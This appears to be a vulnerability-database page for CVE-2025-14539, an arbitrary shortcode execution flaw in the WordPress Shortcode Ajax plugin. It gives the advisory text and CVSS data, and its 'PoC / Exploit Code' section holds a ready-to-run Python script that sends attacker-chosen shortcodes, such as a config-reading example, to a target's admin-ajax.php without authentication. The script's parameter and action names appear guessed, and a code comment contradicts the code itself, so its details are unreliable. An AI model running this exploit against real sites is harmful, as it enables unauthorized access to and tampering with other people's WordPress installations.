Security Vulnerability Report
中文
CVE-2025-14539 CVSS 5.4 MEDIUM

CVE-2025-14539

Published: 2025-12-13 16:16:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The The Shortcode Ajax plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Shortcode Ajax plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14539 PoC - WordPress Shortcode Ajax Plugin Arbitrary Shortcode Execution # Author: Security Researcher # Target: WordPress site with Shortcode Ajax plugin <= 1.0 import requests import sys def exploit_shortcode_ajax(target_url, shortcode): """ Exploit arbitrary shortcode execution via the vulnerable ajax endpoint """ # Determine the admin-ajax.php endpoint if target_url.endswith('/'): ajax_url = target_url + 'wp-admin/admin-ajax.php' else: ajax_url = target_url + '/wp-admin/admin-ajax.php' # Construct the exploit payload # The vulnerable parameter is 'action' which accepts shortcode commands params = { 'action': 'shortcode_ajax', # Plugin's ajax action 'shortcode': shortcode # Arbitrary shortcode to execute } try: print(f'[*] Sending exploit request to: {ajax_url}') print(f'[*] Shortcode payload: {shortcode}') # Send the request (no authentication required) response = requests.get(ajax_url, params=params, timeout=10) print(f'[+] Response Status: {response.status_code}') print(f'[+] Response Content:') print(response.text) return response.text except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return None if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-14539.py <target_url> <shortcode>') print('Example: python cve-2025-14539.py http://target.com "[wp_config_read]"') sys.exit(1) target = sys.argv[1] shortcode_cmd = sys.argv[2] exploit_shortcode_ajax(target, shortcode_cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14539", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:51.107", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Shortcode Ajax plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/shortcode-ajax/trunk/shortcode-ajax.php#L29", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e2a994f-7a42-4ccb-8fa0-77107ba1150c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.